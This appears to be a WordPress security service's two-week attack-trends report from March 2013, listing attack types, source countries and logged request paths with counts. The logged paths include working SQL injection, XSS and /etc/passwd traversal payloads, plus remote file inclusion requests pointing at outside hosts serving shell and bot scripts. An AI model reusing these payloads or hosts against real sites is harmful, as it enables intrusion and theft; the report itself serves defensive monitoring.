Attack Trends March 1-15, 2013
Attack Type
Remote File Inclusion
SQLi
WordPress Username Deduction
Directory Traversal/Local File Inclusion
XSS
File Upload Attempt by Non-Admin Detected
Possible XML-RPC Attacks
WordPress Trackback
Potential [PHP] code execution attacks
PHP/CGI Source Code Disclosure/Coded Execution
Times Seen
3867
1985
1119
711
410
361
356
156
28
14
Attacking Countries
United States
Ukraine
Russian Federation
China
Germany
Canada
Romania
France
Sweden
Hong Kong
Switzerland
Netherlands
Japan
Poland
United Kingdom
Czech Republic
Nigeria
Israel
Brazil
Turkey
Taiwan
Europe
Venezuela
Norway
Spain
Korea, Republic of
Italy
Belarus
Luxembourg
Indonesia
Mexico
Australia
Lithuania
Thailand
Kazakhstan
Kenya
Belgium
Denmark
Vietnam
Chile
United Arab Emirates
Malaysia
Madagascar
Singapore
South Africa
Yemen
Anonymous Proxy
India
Iran, Islamic Republic of
Austria
El Salvador
Serbia
Dominican Republic
Lebanon
Moldova, Republic of
Colombia
Estonia
Jamaica
Iraq
Ghana
Guatemala
Times Seen
6737
450
302
281
169
164
112
109
108
77
61
58
38
35
34
29
24
23
22
21
20
19
18
18
17
14
14
11
8
7
6
5
5
5
5
4
4
4
4
3
3
3
3
2
2
2
2
2
2
2
2
1
1
1
1
1
1
1
1
1
1
Attacked Plugins
/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php
/wp-content/plugins/radykal-fancy-gallery/admin/image-upload.php
/wp-content/plugins/vslider/timthumb.php?src=http%3A%2F%2Fradiopro.ro%2F551081_481072245272916_1741626627_n-300x200.jpg&w=600&h=300&zc=1&q=80
/wp-content/plugins/contact-form-7/images/id.flv???
/wp-content/plugins/vslider/timthumb.php?src=http%3A%2F%2Fradiopro.ro%2Fradiopro.jpg&w=600&h=300&zc=1&q=80
/wp-content/plugins/jetpack/m
/wp-content/plugins/sniplets/view/sniplets/inset.php?text=
/wp-content/plugins/sniplets/view/admin/submenu.php?url=">
/wp-content/plugins/wp-audio-gallery-playlist/playlist.php?post_gallery=-1'+UNION+ALL+SELECT+1,2,3,4,5,database(),current_user(),8,9,10,11,12,13,14,15,16,17,18,version(),20,21,22,23-/wp-content/plugins/wp-cumulus/tagcloud.swf?mode=tags&tagcloud=Click me
/wp-content/plugins/sniplets/view/sniplets/warning.php?text=
/wp-content/plugins/tune-library/tune-library-ajax.php?letter=-1'+UNION+ALL+SELECT+CONCAT_WS(CHAR(59),version(),current_user(),database()),2-/wp-content/plugins/facebook-opengraph-meta-plugin/all_meta.php?pst_title=1')+UNION+ALL+SELECT+CONCAT_WS(CHAR(44),version(),current_user(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- &page=100&rows=1
/wp-content/plugins/foxypress/foxypress-affiliate.php?aff_id="><script>alert(43875062308456)</script>
/wp-content/plugins/nextgen-gallery/xml/media-rss.php?mode=
/wp-content/plugins/accept-signups/accept-signups_submit.php?email=clshack<script>alert(43875062308456)</script>
/wp-content/plugins/ajax-category-dropdown/includes/dhat-ajax-cat-dropdown-request.php?admin&category_id=">
/wp-content/plugins/couponer/print-coupon.php?ID=-1'+UNION+ALL+SELECT+1,version(),database(),current_user(),5,6,7,8,9,10-/wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=../../../../../../../etc/passwd
/wp-content/plugins/search-autocomplete/includes/tags.php?term=-1'+UNION+ALL+SELECT+CONCAT_WS(CHAR(44),version(),current_user(),database()),2,3,4-/wp-content/plugins/sniplets/view/admin/pager.php?page=">
/wp-content/plugins/oqey-gallery/getimages.php?gal_id=0'+UNION+ALL+SELECT+1,2,3,4,5,6,7,CONCAT_WS(CHAR(95),version(),current_user(),database()),9,10%23
/wp-content/plugins/photoracer/changefrom.php?rid="><script>alert(43875062308456)</script>
/wp-content/plugins/photoracer/changeto.php?rid="><script>alert(43875062308456)</script>
Times Seen
167
8
5
4
3
3
3
3
3
2
2
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
Attacked Themes
/wp-content/themes/onepagewebsite/uploads/upload.php
/wp-content/themes/deep-blue/images/upload/&fileext=php
/wp-content/themes/nuance/functions/jwpanel/scripts/valums_uploader/php.php
/wp-content/themes/Avenue/cache/lobo.txt??
/wp-content/themes/folioway/timthumb.php?src=http%3A%2F%2Fpicasa.com.beerdunce.com%2Fbad.php
/wp-content/themes/hulk/scripts/timthumb.php?src=http%3A%2F%2Fpicasa.com.bristel.co.uk%2Fsimple.php
/wp-content/themes/Attack-Scanner-Theme/admin/upload-file.php
/wp-content/themes/hulk/scripts/timthumb.php?src=http%3A%2F%2Fpicasa.com.xenophobiawatch.co.za%2Fsimple.php
/wp-content/themes/hulk/scripts/timthumb.php?src=http%3A%2F%2Fblogger.com.etres60.com.mx%2Fbad.php
/wp-content/themes/blacklabel/framework/timthumb_old.php?src=http://picasa.com.sigem.ci/cok.php
/wp-content/themes/cubed_v1.2/functions/timthumb.php?src=http%3A%2F%2Fflickr.com.howigotoutofdebt.com%2Fbad.php
/wp-content/themes/clockstone/theme/functions/upload.php
/wp-content/themes/folioway/core/thumb.php?src=http%3A%2F%2Fimg.youtube.com.marcomdistributie.ro%2Fbad.php
/wp-content/themes/twentyeleven/wp-admin/'"-->
/wp-content/themes/twentyeleven/wp-admin/?nsextt='"-->
/wp-content/themes/folioway/core/thumb.php?src=http://wordpress.com.fb.bbdginc.com/jos.php
/wp-content/themes/twentyeleven/wp-admin/?'"--></style></script><script>netsparker(0x000A59)</script>
/wp-content/themes/twentyeleven/wp-admin/?hTTp://netsparker.com/n
/wp-content/themes/twentyeleven/wp-admin/?http://www.netsparker.com?
/wp-content/themes/wp-admin/?http://www.netsparker.com?
/wp-content/themes/wp-admin/?nsextt='"-->
/wp-content/themes/wp-admin/'"-->
/wp-content/themes/twentyten/style.css
/wp-content/themes/wp-admin/?'"--></style></script><script>netsparker(0x000A18)</script>
/wp-content/themes/wp-admin/?hTTp://netsparker.com/n
/wp-content/themes/koi/themify/img_x.php?src=http://picasa.com.kidsworldprintables.com/result/bat.php
/wp-content/themes/themorningafter/timthumb.php?src=http%3A%2F%2Fwordpress.com.fb.bbdginc.com%2Fjack.php
/wp-content/themes/?src=http%3A%2F%2Fwordpress.com.fb.bbdginc.com%2Fjos.php
/wp-content/themes/'"-->
/wp-content/themes/flashnews/timthumb.php?src=http%3A%2F%2Fflickr.com.coolrentals.ro/tim.php
/wp-content/themes/twentyeleven/js/'"-->
/wp-content/themes/twentyeleven/js/html5.js'"-->
/wp-content/themes/twentyeleven/style.css'"-->
/wp-content/themes/twentyeleven/'"-->
/wp-content/themes/twentyeleven/colors/'"-->
/wp-content/themes/twentyeleven/colors/dark.css'"-->
Times Seen
55
48
10
8
7
6
4
3
3
3
3
2
2
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
Page 1
Remote File Inclusion
SQLi
WordPress Username Deduction
Directory Traversal/Local File
Inclusion
XSS
File Upload Attempt by NonAdmin Detected
Possible XML-RPC Attacks
WordPress Trackback
Potential [PHP] code execution
attacks
PHP/CGI Source Code Disclosure/Coded Execution
Page 2
Attack Trends March 1-15, 2013
Upload Directoris Searched
/wp-content/uploads/2012/08/FB-RW-Cover2.jpg&w=960&h=300&zc=1
/wp-content/uploads/2010/08/rfihttp://sibkukla.ru/1/bb.jpg???
/wp-content/uploads/2010/08/rfihttp://www.comfaoriente.com//a/ipays.jpg?
/wp-content/uploads/2010/08/dorks.txthttp://www.xfocus.net/tools/200608/r57.txt?
/wp-content/uploads/2010/08/*.php?mosConfig_absolute_path=http://flickr.com.meuviciodesdeoinicio.com.br/bot.txt??
/wp-content/uploads/2012/08/FB-RW-Cover1.jpg&w=960&h=300&zc=1
/wp-content/uploads/2010/08/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sibkukla.ru/1/bb.jpg???
/wp-content/uploads/2010/08/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.comfaoriente.com//a/ipays.jpg?
/wp-content/uploads/2012/08/Slide-KellyCattle.jpg&w=960&h=400&zc=1
/wp-content/uploads/2010/08/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.travel-orzelbialy.zam.pl/galeria/include/copyright.txt??
/wp-content/uploads/2010/08/bbs_sun/skin/zero_vote/error.php?dir=http://flickr.com.annohelpt.nl/css.php??
/wp-content/uploads/2012/08/Slide-CattleMountain2.jpg&w=960&h=400&zc=1
/wp-content/uploads/2012/08/Slide-FeedingCalf.jpg&w=960&h=400&zc=1
/wp-content/uploads/2010/08/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.wushu.org.ge/e107_images/david.txt
/wp-content/zipndownload.php?PP_PATH=http://www.psychvisit.com/id1.txt?
/wp-content/uploads/2010/08/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://picasa.com.radioalasnaciones.com/id.txt?
/wp-content/uploads/zipndownload.php?PP_PATH=http://www.psychvisit.com/id1.txt?
/wp-content/uploads/2012/08/Slide-RopingCalf1.jpg&w=960&h=400&zc=1
/wp-content/uploads/2010/rfihttp://www.comfaoriente.com//a/ipays.jpg?
/wp-content/uploads/2010/08/zipndownload.php?PP_PATH=http://www.psychvisit.com/id1.txt?
/wp-content/uploads/2010/rfihttp://sibkukla.ru/1/bb.jpg???
/wp-content/uploads/2010/08/index.php?go=http://www.travel-orzelbialy.zam.pl/galeria/include/copyright.txt??
/wp-content/uploads/2010/08/index.php?pag=http://www.khzshilat.ir/img/icons/bonze.jpg??
/wp-content/uploads/2010/zipndownload.php?PP_PATH=http://www.psychvisit.com/id1.txt?
/wp-content/uploads/2010/08//components/com_smf/smf.php?mosConfig_absolute_path=http://heritagevirtualairline.net/bonze.jpg??
/wp-content/uploads/2010/08//main.php?page=http://www.travel-orzelbialy.zam.pl/galeria/include/pbot.txt??
/wp-content/uploads/2010/08//modules/vwar/admin/admin.php?vwar_root=http://www.sweet-affiliates.com/no-more-acne//config/bot.txt??
/wp-content/uploads/2012/08/Slide-Branding.jpg&w=960&h=400&zc=1
/wp-content/uploads/2010//orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://octo.beev.no/e107_public/byroe.jpg??
/wp-content/wp-admin/?http://www.netsparker.com?
/wp-content/uploads/2010/08//accounts/inc/include.php?language=0&lang_settings[0][1]=http://blogger.com.ippi.cl/force2.php?
/wp-content/uploads/2010/08//appserv/main.php?appserv_root=http://blogger.com.ippi.cl/force2.php?
/wp-content/uploads/2010/08//config/config_admin.php?INC=http://87.201.203.154/HTouch/kickstart/images/shawls/bonze.jpg??
/wp-content/uploads/2010/index.php?body=http://www.psychvisit.com/id1.txt?
/wp-content/uploads/2010/08/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dubion.com/english/awmdata/menu/pop.jpg??
/wp-content/uploads/2010/08//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.picasa.com.sanalespri.com/b0t.php??
/wp-content/uploads/2012/'"-->
/wp-content/uploads/2010/08//components/com_smf/smf.php?mosConfig_absolute_path=http://heritagevirtualairline.net/international.txt??
/wp-content/wp-admin/?hTTp://netsparker.com/n
/wp-content/wp-admin/?'"--></style></script><script>netsparker(0x000A12)</script>
/wp-content/uploads/'"-->
/wp-content/wp-admin/'"-->
/wp-content/wp-admin/?nsextt='"-->
/wp-content/uploads/2012/10/'"-->
/wp-content/uploads/2010//index.php?load=http://bmwtours.com/flight/include/id.txt????
/wp-content/uploads/2010//orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://octo.beev.no/e107_public/allnet.jpg??
/wp-content/uploads/2010//accounts/inc/include.php?language=0&lang_settings[0][1]=http://blogger.com.ippi.cl/force2.php?
/wp-content/uploads/index.php?body=http://www.psychvisit.com/id1.txt?
/wp-content/uploads/2012/11/'"-->
/wp-content/uploads/2010/08//index.php?load=http://professionaldiving.ru/e107_files/public/avatars/data/pic82.jpg??
/wp-content/uploads/2010/08//main.php?page=http://www.wushu.org.ge/e107_images/david.txt
/wp-content/uploads/2010/08//includes/orderSuccess.inc.php?glob=http://bmwtours.com/flight/include/id.txt????
/wp-content/uploads/2010/08/dorks.txt" h=http://troyanos.eshost.es/plugins/system/scan.txt?
/wp-content/uploads/2010/08/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dubion.com/english/awmdata/menu/rock.jpg??
/wp-content/uploads/2010/08/agendax/addevent.inc.php?agendax_path=http://www.printom.ru/netcat/modules/my_captcha/img/fee4181443c7299d710d3036451418e4?
/wp-content/uploads/2010/08//orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://octo.beev.no/e107_public/byroe.jpg??
/wp-content/uploads/2010/08//orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://octo.beev.no/e107_public/allnet.jpg??
/wp-content/uploads/2010/08/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://picasa.com.radioalasnaciones.com/load.txt???
/wp-content/uploads/2010/08//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dubion.com/english/awmdata/menu/mad01.jpg??
/wp-content/uploads/2010/08//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dubion.com/english/awmdata/menu/mad02.jpg??
/wp-content/uploads/2010/08/index.php?pag=http://www.khzshilat.ir/img/common/gov-trac.txt??
/wp-content/uploads/2010/08/index.php?go=http://www.wushu.org.ge/e107_images/david.txt
/wp-content/uploads/2010/08//config/config_admin.php?INC=http://apamagis.com.br/admconta/n.txt??
/wp-content/uploads/2010/08//config/config_admin.php?INC=http://www.printom.ru/netcat/modules/my_captcha/img/fee4181443c7299d710d3036451418e4?
/wp-content/uploads/2010/08//header.php?abspath=http://picasa.com.blackwellbusiness.com//bot.txt??
/wp-content/uploads/2010/08//index.php?load=http://professionaldiving.ru/e107_files/public/avatars/data/foto81.jpg??
/wp-content/uploads/2010/08/dorks.txt=http://www.avidsen.com/2009/danger.txt??
/wp-content/uploads/2010/08/dorks.txt" h=http://www.alub.com.br/concursos/concursos/recursos/cmd.txt?&&r=s&
/wp-content/uploads/2010/08//index.php?load=http://bmwtours.com/flight/include/id.txt????
/wp-content/uploads/2010/08/index.php?body=http://www.psychvisit.com/id1.txt?
/wp-content/uploads/2010/08/impex/ImpExData.php?systempath=http://www.printom.ru/netcat/modules/my_captcha/img/fee4181443c7299d710d3036451418e4?
Page 3
Times Seen
10
6
6
5
5
4
4
4
4
4
3
3
2
2
2
2
2
2
2
2
2
2
2
2
2
2
2
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1